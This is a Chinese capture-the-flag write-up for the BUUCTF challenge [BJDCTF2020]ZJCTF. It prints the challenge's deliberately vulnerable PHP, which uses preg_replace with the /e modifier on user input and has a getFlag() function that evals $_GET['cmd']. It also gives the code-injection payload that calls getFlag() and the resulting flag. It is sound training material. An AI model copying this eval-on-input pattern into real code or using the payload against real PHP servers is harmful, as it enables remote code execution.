BUUCTF [BJDCTF2020]ZJCTF,不过如此

[BJDCTF2020]ZJCTF,不过如此

  • 考点
      • PHP伪协议
      • preg_replace远程代码执行
  • 实操

考点

PHP伪协议

https://www.cnblogs.com/wjrblogs/p/12285202.html

preg_replace远程代码执行

https://zhuanlan.zhihu.com/p/47353283

实操

打开题目
BUUCTF [BJDCTF2020]ZJCTF,不过如此_第1张图片

乍一看,显然是一个PHP伪协议的题目,要求"I have a dream",以及提示包含next.php
BUUCTF [BJDCTF2020]ZJCTF,不过如此_第2张图片

PD9waHAKJGlkID0gJF9HRVRbJ2lkJ107CiRfU0VTU0lPTlsnaWQnXSA9ICRpZDsKCmZ1bmN0aW9uIGNvbXBsZXgoJHJlLCAkc3RyKSB7CiAgICByZXR1cm4gcHJlZ19yZXBsYWNlKAogICAgICAgICcvKCcgLiAkcmUgLiAnKS9laScsCiAgICAgICAgJ3N0cnRvbG93ZXIoIlxcMSIpJywKICAgICAgICAkc3RyCiAgICApOwp9CgoKZm9yZWFjaCgkX0dFVCBhcyAkcmUgPT4gJHN0cikgewogICAgZWNobyBjb21wbGV4KCRyZSwgJHN0cikuICJcbiI7Cn0KCmZ1bmN0aW9uIGdldEZsYWcoKXsKCUBldmFsKCRfR0VUWydjbWQnXSk7Cn0K

解密后的next.php代码如下


$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
          // 利用点1
    return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);
}


foreach($_GET as $re => $str) {
     
    echo complex($re, $str). "\n";
}

function getFlag(){
     		// 利用点2
	@eval($_GET['cmd']);
}

分析一波,出题人应该是希望我们通过preg_match远程代码执行来调用getFlag()函数,从而达到获取flag的目的,下面实现这个操作。
paload:\S*=${getFlag()}
内容详情看:https://zhuanlan.zhihu.com/p/47353283

BUUCTF [BJDCTF2020]ZJCTF,不过如此_第3张图片

flag{5045901b-75d4-4d0a-8e49-67c27c6b1f86}

你可能感兴趣的:(php)